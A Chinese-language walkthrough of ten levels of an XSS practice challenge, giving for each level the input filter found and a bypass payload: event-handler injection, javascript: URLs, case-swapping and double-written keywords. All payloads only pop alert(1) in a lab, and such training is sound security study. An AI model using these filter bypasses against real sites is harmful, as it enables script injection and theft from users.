哆啦集成了网络上常见的靶场与Github上比较好的靶场系统,配合一键启动模式,省去你去收集再进行搭建的时间,方便你更加快速的学习信息安全。
该靶场已经正式开源,黑白网去除登录限制重构靶场环境,bachang.heibai.org
正文部分
XSS挑战赛第一关
F12查看了源码发现并没有任何过滤,
<script>alert(1)</script>
XSS挑战赛第二关
查看源码发现<>尖括号无法使用
框内输入
" onmouseover=alert(1)>[object Object]
或者将input文本框提前闭合
"><script>alert(1)</script>[object Object]
XSS挑战赛第三关
和第二关的区别在于代码内多了一句value='".htmlspecialchars($str)."'
无法使用尖括号,so继续使用不用尖括号的弹窗
' onmouseover=alert(1)//
在源码构成
<input name="keyword" value=" " onmouseover="alert(1)//'">
即可
XSS挑战赛第四关
htmlspecialchars+尖括号过滤
在没有尖括号并且语句不被htmlspecialchars()函数影响的情况下
输入
" onclick=alert(1) //
在点击搜索框触发XSS
XSS挑战赛第五关
strreplace 就直接把on转换成 o_n
这样就过滤了js事件但是没过滤尖括号
所以
"><a href=javascript:alert(1)>
即可
点击“>触发
XSS挑战赛第六关
script 转换成 scr_ipt
on 转换成 o_n
src 转换成 sr_c
data 转换成 da_ta
href 转换成 hr_ef
但是没有大小写约束
"> <Script>alert(1)</script> //
直接冲冲冲
XSS挑战赛第七关
禁用了大小写同时script,on,src ,data ,href 都直接转换成空。
利用双写绕过
">hello<sscriptcript>alert(1)</sscriptcript>
XSS挑战赛第八关
script 转换成 scr_ipt
on 转换成 o_n
src 转换成 sr_c
data 转换成 da_ta
href 转换成 hr_ef
大小写禁用
" 被编码,但是尖括号等符号没有被过滤,输出点在a标签内,href属性中
javascript会被替换成javasc_rpt,我们使用r来代替r
键入
javascript:alert(1)
并点击添加后,再点击友情链接即可触发
XSS挑战赛第九关
查看源码发现不带http://即为不合法提交
javascript:alert(1)//http://heibai.org
键入后点击友情链接即可触发
XSS挑战赛第十关
查看源代码,有get参数有隐藏框
keyword = test&t_sort="type="text" onclick = "alert(1)
直接冲冲冲